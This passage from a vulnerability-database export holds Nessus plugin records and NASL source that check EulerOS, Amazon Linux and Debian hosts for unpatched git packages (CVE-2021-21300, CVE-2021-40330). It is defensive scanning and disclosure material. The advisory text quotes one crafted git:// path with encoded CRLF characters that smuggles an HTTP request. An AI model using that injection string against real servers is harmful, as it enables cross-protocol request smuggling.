script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a0fdea9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.6\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.6\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.6\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"git-2.23.0-1.h7.eulerosv2r7\",\n \"perl-Git-2.23.0-1.h7.eulerosv2r7\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:21", "description": "The version of git installed on the remote host is prior to 2.23.4-1. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2021-1621 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-27T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : git (ALAS-2021-1621)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-08-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:git-core", "p-cpe:/a:amazon:linux:git-core-doc", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-gui", "p-cpe:/a:amazon:linux:git-instaweb", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-subtree", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:gitk", "p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:perl-Git-SVN", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1621.NASL", "href": "https://www.tenable.com/plugins/nessus/148193", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1621.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148193);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/30\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"ALAS\", value:\"2021-1621\");\n\n script_name(english:\"Amazon Linux 2 : git (ALAS-2021-1621)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of git installed on the remote host is prior to 2.23.4-1. It is, therefore, affected by a vulnerability as\nreferenced in the ALAS2-2021-1621 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1621.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21300\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update git' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-core-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-instaweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-subtree\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'git-2.23.4-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-2.23.4-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-2.23.4-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-all-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-2.23.4-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-2.23.4-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-2.23.4-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-core-doc-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-cvs-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-daemon-2.23.4-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-daemon-2.23.4-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-daemon-2.23.4-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-debuginfo-2.23.4-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-debuginfo-2.23.4-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-debuginfo-2.23.4-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-email-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-gui-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-instaweb-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-p4-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-subtree-2.23.4-1.amzn2.0.1', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-subtree-2.23.4-1.amzn2.0.1', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-subtree-2.23.4-1.amzn2.0.1', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'git-svn-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gitk-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'gitweb-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perl-Git-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perl-Git-SVN-2.23.4-1.amzn2.0.1', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-all / git-core / etc\");\n}", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-10T19:37:16", "description": "The remote Debian 10 host has packages installed that are affected by multiple vulnerabilities as referenced in the dla-3145 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\n - git_connect_git in connect.c in Git before 2.30.1 allows a repository path to contain a newline character, which may result in unexpected cross-protocol requests, as demonstrated by the git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 substring. (CVE-2021-40330)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Debian DLA-3145-1 : git - LTS security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-40330"], "modified": "2022-10-13T00:00:00", "cpe": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-all:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-cvs:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-daemon-run:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-daemon-sysvinit:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-doc:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-el:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-email:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-gui:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-man:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-svn:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:gitk:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:gitweb:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:git-mediawiki:*:*:*:*:*:*:*"], "id": "DEBIAN_DLA-3145.NASL", "href": "https://www.tenable.com/plugins/nessus/166092", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-3145. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166092);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/13\");\n\n script_cve_id(\"CVE-2021-21300\", \"CVE-2021-40330\");\n\n script_name(english:\"Debian DLA-3145-1 : git - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 10 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndla-3145 advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\n - git_connect_git in connect.c in Git before 2.30.1 allows a repository path to contain a newline character,\n which may result in unexpected cross-protocol requests, as demonstrated by the\n git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 substring. (CVE-2021-40330)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=985120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/git\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/lts/security/2022/dla-3145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-21300\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2021-40330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/buster/git\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the git packages.\n\nFor Debian 10 buster, these problems have been fixed in version 1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-40330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-daemon-run\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-daemon-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(10)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 10.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '10.0', 'prefix': 'git', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-all', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-cvs', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-daemon-run', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-daemon-sysvinit', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-doc', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-el', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-email', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-gui', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-man', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-mediawiki', 'reference': 